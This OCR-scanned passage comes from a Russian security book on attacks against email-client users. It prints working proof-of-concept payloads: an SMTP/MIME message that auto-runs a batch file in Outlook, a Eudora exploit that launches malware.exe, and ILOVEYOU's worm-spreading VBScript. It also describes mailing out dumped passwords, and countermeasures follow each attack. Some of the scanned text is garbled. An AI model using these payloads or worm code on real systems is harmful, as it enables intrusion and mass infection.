Стюарт Мак-Клар, Джоел Скембрэй, Джордж Куртц. Секреты хакеров. Безопасность сетей - готовые решения
Подождите немного. Документ загружается.
А Пользователи Windows 2000 должны вернуться к версии 5.01, установить модуль
обновления, а затем обновить версию до 5.5. Это нужно осуществить, посколь-
ку в Windows 2000 служба защиты системных файлов (WFP — Windows File
Protection) предотвращает обновление файла
wab32.dll
в процессе установки
модуля обновления для IE 5.5.
Если выполняется установка, отличная от установки по умолчанию, и во время
этого процесса устанавливаются обновленные компоненты Outlook Express, то опи-
санный изъян также устраняется (при этом у пользователя будет возможность соот-
ветствующего выбора).
При установке модуля обновления IE 5.5 на компьютер с операционной сис-
темой Windows 2000 обновленные компоненты Outlook Express не устанавли-
ваются, поэтому этот изъян не устраняется.
Следует также заметить, что по утверждению компании Microsoft пользователи
Outlook, у которых эта программа настроена только для использования служб MAPI,
не подвержены негативному влиянию, независимо от установленной у них версии
Internet Explorer. Если службы электронной почты Internet не установлены
(Tools^Services),
то
библиотека
INETCOMM.
DLL
не
используется.
Запуск файлов из вложения MIME
Популярность
Простота
Опасность
Степень риска
6
8
10
8
Этот изъян, основанный на использовании почтового вложения и многофункцио-
нального
дескриптора
HTML
I
FRAME,
обнаружил известный аналитик
по
вопросам
безопасности Хуан Карлос Гарсия Квартанго (Juan Carlos Garcia
Cuartango).
Анало-
гичный способ применения дескриптора
I
FRAME
для
запуска вложений почтовых
со-
общений с помощью содержащегося в них поля MIME Content-ID был продемонст-
рирован Георгием
Гунински
в его отчете #9 за 2000 год (этот метод рассматривался
выше). Хуан Карлос обнаружил, что исполняемые файлы могут быть автоматически
запущены из броузера IE или почтового сообщения в формате HTML, если они поме-
чены как некорректный тип MIME. Что еще хуже, такая ситуация может привести к
обходу фильтров анализа содержимого почтовых сообщений.
На своем Web-узле Хуан Карлос разместил три примера использования этой тех-
нологии
(http://www.kriptopolis.com).
Ниже приведен один из этих примеров, в
котором командный файл hello.bat представляется как аудио-файл. Авторы незна-
чительно модифицировали исходный код Хуана Карлоса, чтобы разместить его в кап-
суле для взлома электронной почты и передать серверу SMTP.
helo
somedomain.com
mail from:
<mallory@attacker.com>
rcpt to:
<hapless@victim.net>
data
Subject: Is Your Outlook Configured Securely?
Date:
Thu,
2
Nov
2000 13:27:33 +0100
MIME-Version: 1.0
Content-Type:
multipart/related;
type="multipart/alternative";
Глава 16. Атаки на пользователей Internet 675
boundary="l"
X-Priority: 3
X-MSMail-Priority:
High
X-Unsent:
I
— 1
Content-Type:
multipart/alternative;
boundary="2"
--2
Content-Type:
text/html;
charset="iso-8859-l"
Content-Transfer-Encoding:
quoted-printable
<HTML>
<HEAD>
</HEAD>
<BODY
bgColor=3D#ffffff>
<iframe
src=3Dcid:THE-CID
height=3DO
width=3DOX/iframe>
If secure, you will get prompted for file download now. Cancel. <BR>
If not, I will now execute some
commands...<BR>
</BODY>
</HTML>
Content-Type:
audio/x-wav;
name="hello.bat"
Content-Transfer-Encoding:
quoted-printable
Content-ID: <THE-CID>
echo OFF
dir C:\
echo YOUR SYSTEM HAS A VULNERABILITY
pause
quit
Обратите внимание, что в поле content-ID фрагмента MIME (часть: 1) приведен-
ного
выше
примера
содержится значение
<THE-CID>.
Ссылка
на это
поде содержится
в
дескрипторе
I
FRAME,
внедренном
в
основное
тело
сообщения
(часть
2
фрагмента
MIME). (Обе строки в коде выделены полужирным шрифтом.) При предварительном
просмотре
этого
сообщения
в
Outlook/OE
дескриптор
I
FRAME
обрабатывается,
в ре-
зультате чего выполняется заданный фрагмент. В этом фрагменте MIME содержится
ссылка на командный файл, выводящий на консоль предупреждающее сообщение,
как показано на приведенном ниже рисунке.
676 Часть IV.
Хакинг
программного обеспечения
1
;
c:\wiiw\Syst
етзЛттАехе
HROf
C:\OocuHents
and
Setlings\fldninistrator>echo
OFF
J
Volume
in
drive
С has no
label.
Volume
Serial
Number
is
9498
t
:
822
Directory of C:\
84/17/2001
93:16a
04/08/2001
85:46p
<DIR>
Й5/08/20Ю.
02:59p
<OIR>
04Л.7/Р001
03:lla
<DTR>
04/17/2001
03:14a
<DIR>
04/16/2001
09:43p
<DIR>
1
Filets)
5
Dirts
)
44,689.059
VOUR SVSTEM
HflS
fl
VULNERRBILITV
Press any key to continue . . .
«1 .
1
628
Uestr
Documents an
Inetpub
Program
file
test
HINNT
629
bytes
,840 bytes free
t
£
На своем
Web-узле
Хуан
Карлос
разместил также примеры аналогичного применения
исполняемых файлов Win32 и сценариев VBScript. Их использовать так же просто, как и
вставлять код внутрь фрагмента MIME, заданного с помощью идентификатора <THE-CID>.
Эту же атаку можно реализовать и с использованием Web-страницы. В любом слу-
чае абсолютно очевидно, что описанный изъян является очень серьезным, поскольку
позволяет взломщикам запустить любой код на целевом компьютере, просто передав
его в качестве почтового сообщения.
Интересные возможности предоставляет также подход, который можно реализо-
вать с использованием утилиты
passdump
(http://www.hackersclub.com).
Эта ути-
лита считывает пароль текущего зарегистрировавшегося пользователя Windows из па-
мяти и записывает его в файл
%systemroot%\pass.txt.
Метод, предложенный Хуа-
ном Карлосом, можно использовать для запуска утилиты passdump как вложения
MIME. Затем, воспользовавшись любым из других приемов, описанных в этой главе,
файл pass.txt можно переслать по почте удаленному взломщику, воспользовавшись
подходом, применяемым в
вирусах-"червях"
адресной книги Outlook (см. следующий
раздел). Только представьте себе огромное количество пользователей, которые, сами
того не подозревая, рассылают свои пароли изо дня в
день...
О Контрмеры
В качестве краткосрочной меры против этого изъяна можно воспользоваться моду-
лем обновления компании Microsoft (бюллетень
MSO1-020)
или установить сервисный
пакет 2 для Win 2000. В результате будет модифицирован механизм IE, используемый
для обработки фрагментов MIME необычного типа, внедренных в код HTML. При
этом изменится также и поведение самого броузера IE. После установки модуля об-
новления вместо автоматического запуска вложений MIME пользователю придется
вручную подтвердить необходимость загрузки файла. В бюллетене Bugtraq этот изъян
имеет идентификатор 2524
(http://www.securityfocus.com/bid/2524).
Более продолжительная защита от автоматического выполнения вложений предпо-
лагает настройку процесса чтения почтовых сообщений в
Outlook/OE
как можно с бо-
лее высоким уровнем безопасности. В частности, если для зоны запрещена загрузка
файлов, то воспользоваться данным изъяном будет невозможно. Зоны безопасности
более подробно обсуждались в разделе "Разумное использование зон безопасности:
общее решение проблемы элементов
ActiveX".
Глава 16. Атаки на пользователей Internet
677
*
*Л°*
*
Скрытый запуск вложений
с использованием почтовой программы Eudora
Популярность
Простота
Опасность
Степень риска
6
8
10
8
В этой главе уже было рассмотрено множество изъянов клиентского программного
обеспечения Microsoft, однако это далеко не единственная компания,
страдающая
от
самых разнообразных изъянов, обнаруженных в ее почтовых программах. Как сооб-
щается на узле
malware.
com, популярный почтовый клиент Eudora для Windows ком-
пании
Qualcomm
также обладает изъяном, позволяющим взломщику выполнить про-
извольный код на удаленной системе. От пользователя требуется
лишь
запустить
программу и загрузить почтовое сообщение. При этом предполагается,
чти
на удален-
ной системе установлена свободно распространяемая версия Eudora 5.0.2 для Win
9x,
NT 4 или 2000 со следующей конфигурацией.
Т Доступна область предварительного просмотра. Если этот не так,
то
для запуска
кода нужно, чтобы пользователь открыл почтовое сообщение.
А Активизирован режим использования программ компании Microsoft, Use Micro-
soft's viewer
(Tools^Options^Viewing
Mail). Этот режим используется по умолча-
нию. (В отличие от более ранних сообщений для использования изъяна не тре-
буется, чтобы был включен режим Allow executables in HTML content.)
Описываемый изъян основан на способе, который используется в программе Eu-
dora при обработке файлов почтовых HTML-сообщений
(например,
встроенных изо-
бражений). Эти файлы сохраняются в
специальном
каталоге, а в электронном сооб-
щении ссылка на эти файлы выполняется с помощью идентификаторов Content-ID,
являющихся частью URL вида
cid:
content-id.
Таким образом, если взломщик сконструирует почтовое
сообщение
в формате
HTML с двумя вложениями и одной ссылкой в теле сообщения на идентификатор
CID одного из вложений, то он сможет запустить вложение. Встроенная ссылка вы-
зывает первое вложение HTML, в котором содержится код JavaScript,
инстанцирую-
щий
второе вложение как объект ActiveX, который и будет запущен.
Использование описанного изъяна можно продемонстрировать с помощью приве-
денного ниже проверочного кода, расположенного
по
адресу
http:
//www.malware.
com/you!DORA.txt.
MIME-Version: 1.0
To:
hapless@victim.com
Subject:
YOU!DORA
Content-Type:
multipart/related;
boundary="-CF416DC77A62458520258885"
-CF416DC77A62458520258885
Content-Type:
text/html;
charset=us-ascii
Content-Transfer-Encoding: 7bit
<!doctype html public
"-//w3c//dtd
html
3.2//en">
<html>
<head>
678 Часть IV. Хакинг программного
[обеспечения
<title>YOU!DORA</title>
</head>
<bode
bgcolor="#0000ff"
text="#000000"
link="#0000ff"
vlink="#800080"
alink="#ff0000"
<br>
<br>
<img
SRC="cid:mr.malware.to.you"
style="display:none">
<img
id=WOW
src="cid:malware.com"
style="display:none">
<center><h6>YOU!
DORA</h6x/center>
<IFRAME
id=malware
width=10
height=10
style="display:none"
></IFRAME>
<script>
//
18.03.01
http://www.malware.com
malware.location.href=WOW.src
</script>
</body>
</html>
-CF416DC77A62458520258885
Content-type:
application/octet-stream
Content-ID:
<mr.malware.to.you>
Content-Transfer-Encoding:
base64
Content-Disposition: inline;
filename="malware.exe"
[base64-encoded attachment
"malware.exe"]
-CF416DC77A62458520258885
Content-type:
application/octet-stream;
charset=iso-8859-l
Content-ID:
<malware.com>
Content-Transfer-Encoding:
base64
Content-Disposition:
inline;
filename="You!DORA.html"
[base64-encoded attachment
"YoulDORA.html"]
-CF416DC77A62458520258885—
Как только с использованием клиента Eudora это сообщение будет получено, фай-
лы
YouiDORA.html
и
malware.exe
будут помещены в каталог для хранения внедрен-
ных файлов (где обычно содержатся встроенные вложения MIME). После этого фраг-
мент JavaScript
location.href,
содержащийся в теле сообщения, с помощью иден-
тификатора content-ID обратится к файлу
YoulDORA.html,
который, в свою очередь,
с использованием внедренного кода JavaScript выполнит профамму
malware.
ехе. Хо-
тя в исходном сообщении файл
YoulDORA.html
зашифрован в формате Base 64, в
формате ASCII он имеет следующий вид.
<script>
//
http://www.malware.com
- 18.03.01
document.writeln(
ч
<1FRAME
ID=runnerwin
WIDTH=0
HEIGHT=0
SRC="about:blank"x/IFRAME>' )
;
function
linkit(filename)
{
strpagestart =
"<HTML><HEADX/HEADXBODY><OBJECT
CLASSID="
+
"
'CLSID:15589FA1-C456-11CE-BF01-OOAA0055595A'
CODEBASE='";
strpageend =
"'></OBJECTX/BODYX/HTML>";
runnerwin.document.open
();
runnerwin.document.write(strpagestart
+ filename +
strpageend);
}
linkit('malware.exe');
</script>
Глава 16. Атаки на пользователей Internet 679
Как видно из приведенного фрагмента, файл
malware.
exe автоматически запускает-
ся с
помощью процедуры
linkit,
которая встраивает
имя
файла
в код
HTML, разме-
щаемый
в
окне
I
FRAME.
(Более подробная
информация
об
автоматическом запуске
фай-
лов с помощью гиперссылок, в том числе пример исходного кода, можно найти в статье
Q232077
базы знаний компании Microsoft
по
адресу
http:
//support.microsoft.
com/support/kb/articles/Q232/0/77.ASP.)
Как и планировалось, без какого-либо участия пользователя (за исключением
предварительного просмотра входящего почтового сообщения) файл
malwcire.exe
бу-
дет автоматически запущен. При этом на экране появится окно командной строки с
изображением простирающихся вверх языков пламени. Однако это далеко не так пло-
хо, как могло бы быть.
О Контрмеры: скрытый запуск вложений Eudora
Для защиты лучше всего перейти к использованию версии
5.1
программы Eudora.
Ее свободно распространяемую версию можно загрузить с Web-узла
http:
//www.eudora.com.
Можно также отключить режим
Use
Microsoft's
Viewer.
Кро-
ме того, отмена возможности использования сценариев JavaScript и элементов управ-
ления ActiveX в IE также позволит защититься от подобных атак (см. раз-
дел "Разумное использование зон безопасности: общее решение проблемы элементов
ActiveX"). В бюллетене
Bugtraq
описание этого изъяна можно найти под номером
2490
(http://securityfocus.com/bid/2490).
"Черви",
распространяющиеся через
адресную книгу Outlook
В течение нескольких последних лет XX века мошенники, избравшие своим инстру-
ментом компьютерный код, организовали за счет пользователей программ Outlook и
Outlook Express буйную новогоднюю "вечеринку". Ими было выпущено
це|юе
полчище
вирусов-червей, размножающихся по изящной технологии: осуществляя самостоятельно
рассылку по каждому адресу, найденному в адресной книге жертвы, эти вирусы маски-
ровались под сообщения, присланные из надежного источника. Это оригинальное при-
менение методов социальной инженерии (см. главу 14, "Расширенные методы") было
ударом, который злой гений-изобретатель наносил наверняка. Корпорации, в которых
работали десятки тысяч служащих, активно использующих Outlook,
были
вынуждены
отказаться от применения почтовых служб, чтобы остановить поток сообщений, сную-
щих туда-сюда от одного пользователя к другому, засоряя почтовые ящики и забивая до
отказа дисковое пространство почтовых серверов. Согласитесь, тяжело удержаться от
того, чтобы не открыть вложение, пришедшее от знакомого, которому вы доверяете.
Первая "ракета" подобного рода называлась Melissa. Хотя ее предполагаемый автор
Девид
Л. Смит (David L. Smith) был пойман и в конце концов признан | виновным в
нанесении ущерба второй степени, за которое по закону положен
тюреЦный
срок от
пяти до десяти лет и штраф в размере до
$150000,
люди по-прежнему
продолжали
за-
ниматься подобными экспериментами. Вирусы с такими привычными названиями,
как
Worm.Explore.Zip,
BubbleBoy и ILOVEYOU появлялись один за другим, пока при-
мерно к концу 2000 года не стало казаться, что даже средства массовой информации
устали от всех этих сенсаций. Однако этот процесс все еще продолжается и поэтому
заслуживает отдельного упоминания.
680 Часть IV. Хакинг программного обеспечения
«.*.'."
"Червь" ILOVEYOU
Популярность
Простота
Опасность
Степень риска
5
5
10
7
Ниже приведена подпрограмма "червя" ILOVEYOU, написанная на языке
VBScript, которая обеспечивает его распространение через электронную почту
(некоторые строки были разделены вручную, чтобы уместить их на странице).
sub
spreadtoemail()
On Error Resume Next
dim
x,a,ctrlists,сtrentries,malead,b,regedit,regv,regad
set
regedit=CreateObject("WScript.Shell")
set out=WScript.CreateObject("Outlook.Application")
set
mapi=out.GetNameSpace("MAPI")
for
ctrlists=l
to
mapi.AddressLists.Count
set a=mapi.AddressLists(ctrlists)
x=l
regv=regedit.RegRead("HKEY_CURRENT_USER\Software\Microsoft\WAB\"Sa)
if
(regv="")
then
regv=l
end if
if
(int(a.AddressEntries.Count)>int(regv))
then
for ctrentries=l to
a.AddressEntries.Count
malead=a.AddressEntries(x)
regad=""
regad=regedit.RegRead("HKEY__CURRENT_USER\Software\Microsoft\WAB\"&malead)
if
(regad="")
then
set
male=out.Createltem(O)
male.Recipients.Add(malead)
male.Subject
= "ILOVEYOU"
male.Body
=
vbcrlf&"kindly
check the attached LOVELETTER coming from
me."
male.Attachments.Add(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
male.Send
regedit.RegWrite
"HKEY_CURRENT_USER\Software
\Microsoft\WAB\"&malead,1,"REG_DWORD"
end if
x=x+l
next
regedit.RegWrite
"HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a,a.AddressEntries.Count
else
regedit.RegWrite
"HKEY_CURRENT_USER\Software\Microsoft\WAB\"ia,a.AddressEntries.Count
end if
next
Set
out=Nothing
Set
mapi=Nothing
end sub
Эта простая программа длиной в 37 строк обращается к интерфейсу MAPI, чтобы
отыскать местоположение адресной книги Windows (WAB — Windows Address Book) в
системном
реестре.
Затем
она
создает
новое
почтовое
послание
с
темой
ILOVEYOU
и
телом
kindly
check
the
attached
LOVELETTER
coming
from
me
("будьте
так лю-
безны, прочтите вложенное любовное письмо, пришедшее вместе с данным сообще-
Глава 16. Атаки на пользователей Internet
681
нием"),
которое рассылается каждому найденному адресату. (Спасибо Брайану Льюи-
су (Brian Lewis) из компании Foundstone, Inc. за помощь в анализе исходного кода.)
Если кто-нибудь из далеких от программирования читателей думает, что речь здесь
идет о какой-нибудь сложной науке, то будет уместно напомнить, что принцип рабо-
ты вируса ILOVEYOU основан на дипломной работе, написанной 23-летним студен-
том. Кто знает, какой еще ущерб мог бы быть нанесен?
Как остановить "червей", распространяющихся через
адресную книгу
После нескольких лет критики в средствах массовой информации компания Mi-
crosoft устала обращать внимание пользователей на то, что они сами запускают вло-
жения электронной почты, в которых содержатся
вирусы-"черви",
и выпустила соот-
ветствующий модуль обновления. Он называется Outlook 2000
SR-1
E-mail Security
Update
(http://office.microsoft.com/downloads/2000/Out2ksec.aspx).
Одной
из особенностей этого модуля является наличие в нем механизма защиты модели объ-
ектов (OMG — Object Model Guard), который был разработан для предупреждения
пользователей о том, что внешней программой предпринята попытка получения дос-
тупа к их адресной книге Outlook или отправки сообщений от их имени.
Компания Reliable Software Technologies Corporation
(RSTCorp
в настоящее время на-
зываемая Cigital,
http://www.cigital.com)
выпустила дополнительную утилиту, пре-
дотвращающую обращения к Outlook определенного типа, поступающие от компонента
Virtual Basic Scripting Engine. Таким образом можно предотвратить распространение ви-
русов, подобных ILOVEYOU. Эту дополняющую программу, которая называется
JustBeFriends.dll
(JBF), можно использовать совместно с модулем обновления про-
граммы Outlook, который предлагается компанией Microsoft. В отличие от механизма
OMG
компании Microsoft, который контролирует доступ к функциям Outlook внутри
самой программы, JBF контролирует возможность доступа к Outlook или Outlook Express
со стороны других приложений. Если попытка доступа осуществляется с помощью сце-
нария, запущенного с рабочего стола или из вложения, то утилита JBF предотвращает
эту попытку. В противном случае пользователь должен подтвердить, что данному при-
ложению разрешен доступ к Outlook. Технические подробности об использовании про-
граммы JBF можно найти по адресу
http:
//www.cigital.com/jbf/tech.html.
Специалисты компании Cigital утверждают, что их подход более надежный, чем тот,
которым воспользовалась компания Microsoft при разработке модели OMG, поскольку
во втором случае необходимо обеспечить защиту огромного количества объектов, что
является трудной задачей. Они также отмечают, что адреса электронной почты могут
быть выявлены не только в адресной книге, но и в цифровых подписях, в теле сообще-
ния или других документах, а также в некоторых других местах, которые
Щтуг
быть об-
наружены и использованы для организации атак. Ограничив доступ к Outlook/OE со
стороны сценариев, утилита JBF теоретически может предотвратить новые атаки, осно-
ванные на использовании широкого диапазона аналогичных приемов.
Программу JustBeFriends можно найти на узле
http://www.cigital.com/jbf/.
Авторы рекомендуют воспользоваться этой программой всем тем, у кого программа
Outlook/OE установлена на платформе NT/2000.
Программа
JustBeFriends
не
работает
на
платформе
Win
Эх.
682 Часть IV.
Хакинг
программного
Обеспечения
Атаки с использованием вложений
Одной из наиболее удобных особенностей электронной почты является возмож-
ность вставки в сообщения файлов. Однако это удобство, позволяющее сэкономить
время, имеет и очевидные отрицательные стороны, а именно: у пользователей появля-
ется непреодолимая тяга запустить чуть ли не каждый файл, полученный по элек-
тронной почте. Кажется, никому не нужно напоминать, что это равносильно пригла-
шению к себе в дом подозрительных типов.
В последующих разделах обсуждаются многие виды атак, основанных на использова-
нии файлов, присоединенных к электронным сообщениям. Существует ряд механизмов,
позволяющих замаскировать истинные цели файла-вложения или придать ему
"притягательную" форму, при которой палец жертвы сам тянется к кнопке мыши. Неко-
торые из описанных видов атак оказываются намного более коварными, когда вложенный
файл записывается на диск без какого бы то ни было участия со стороны пользователя и его
уведомления. Большинство пользователей Internet понимают, что с вложениями электрон-
ной почты нужно обращаться крайне осторожно и с
большой
долей скептицизма. Авторы
надеются, что следующий раздел окончательно убедит их в этом мнении.
Взлом с использованием в качестве
вложений файлов-фрагментов
Популярность
Простота
Опасность
Степень риска
5
5
10
7
Малоизвестным секретом системы Windows является то, что у файлов с расшире-
нием . SHS их реальное расширение по умолчанию скрыто в соответствии с парамет-
ром системного реестра
HKEY_CLASSES_ROOT\ShellScrap\NeverShowExt.
Очевидно,
что в этом не было бы ничего особенного, если бы эти файлы . SHS, также известные
как объекты Shell Scrap Objects, не обладали возможностью запускать команды. Осно-
ванные на технологии Object Linking and Embedding (OLE), обсуждавшейся в разделе,
посвященном элементам управления ActiveX, эти файлы являются, по
существу,
обо-
лочками для других внедренных объектов. Такими объектами могут быть электронные
таблицы Excel (большинство читателей знают, что их можно помещать в документы
Word) или файлы другого типа. Самый простой способ создать такой файл — это вне-
дрить какой-либо объект в другое приложение, поддерживающее технологию OLE
(например, Wordpad), а затем скопировать этот объект в другую папку. Теперь объект
содержится в своем собственном файле-оболочке, имеет свою пиктограмму и уни-
кальное расширение (SHS). При запуске SHS-файла помещенный в него объект за-
пускается вместе с ним. Более того, с помощью компонента Microsoft Object Packager
с вложенным объектом можно связывать команды, что открывает новые возможности
для тех, кто хоть немного знаком с DOS.
В июне 2000 года неизвестным злоумышленником был запущен "червь", получив-
ший название LifeChanges. Его работа основывалась на описанных свойствах файлов
. SHS. Этот "червь" направлялся в виде электронного сообщения с изменяющейся
строкой темы, которая указывала на то, что во вложении находятся анекдоты. Файл
вложения на самом деле был файлом . SHS с обманным расширением . тхт, которое
делало его похожим на обычный текстовый файл (даже установленная по умолчанию
пиктограмма этого файла была похожа на пиктограмму текстового файла). После за-
Глава 16. Атаки на пользователей Internet 683
пуска LifeChanges выполнял стандартные действия: рассылал себя по почте первым 50
адресатам из адресной книги жертвы, удалял файлы и т.д. Очень интересно было на-
блюдать, как кто-то выбрал основой для взлома коварную особенность файлов
.SHS,
которая была известна на протяжении нескольких лет, и с такой легкостью попал в
хронику Web-узла PCHelp
(http://www.pc-help.org/security/scrap.htm).
Кто
знает, сколько мин еще заложено в системном реестре Windows?
О Контрмеры: использование
файлов.
SHS
На Web-узле PCHelp приведены некоторые практические рекомендации по сни-
жению риска применения наиболее опасных свойств файлов . SHS. В число этих ре-
комендаций входят следующие.
Т Удалите упоминавшийся ранее параметр системного реестра
NeverShowExt
и па-
раметр
HKLM\SOFTWARE\Classes\DocShortcut,
чтобы расширения
.
:
SHS
и . SHB
стали видны в Windows. (Файлы .
SHB
обладают аналогичными
свойствами.)
• Замените используемые антивирусные программы теми, в которых файлы . SHS
и . SHB рассматриваются как исполняемые.
А Полностью откажитесь от файлов . SHS, удалив их из списка
известных
типов
файлов Windows либо удалив из папки System файл
shscrap.dll.
Сокрытие расширения файла вложения
с помощью пробелов
Популярность
Простота
Опасность
,
,
Степень риска
7
8
9
8
18 мая 2000 года Волкер Вес (Volker
Werth)
поместил в списке
рассьщки
Incidents
сообщение, в котором говорилось об одном методе отправки вложений в почтовых
сообщениях. Особенность этого метода заключалась в остроумном способе маскиров-
ки имени присоединенного файла. Вставка в имя файла символов пробелов
(%20
в
шестнадцатеричном
формате) приводила к тому, что почтовые программы отображали
только первые несколько символов имени файла, как показано ниже.
freemp3.doc
. . . [150 пробелов] . . .
.ехе
Название этого вложения выглядит в интерфейсе пользователя как
freemp3.doc.
Сам файл выглядит вполне безобидным и, казалось бы, его можно сохранить на диске
или запустить прямо из почтовой программы. Вот как выглядит моментальный сни-
мок окна программы Outlook Express.
684 Часть IV. Хакинг программного обеспечения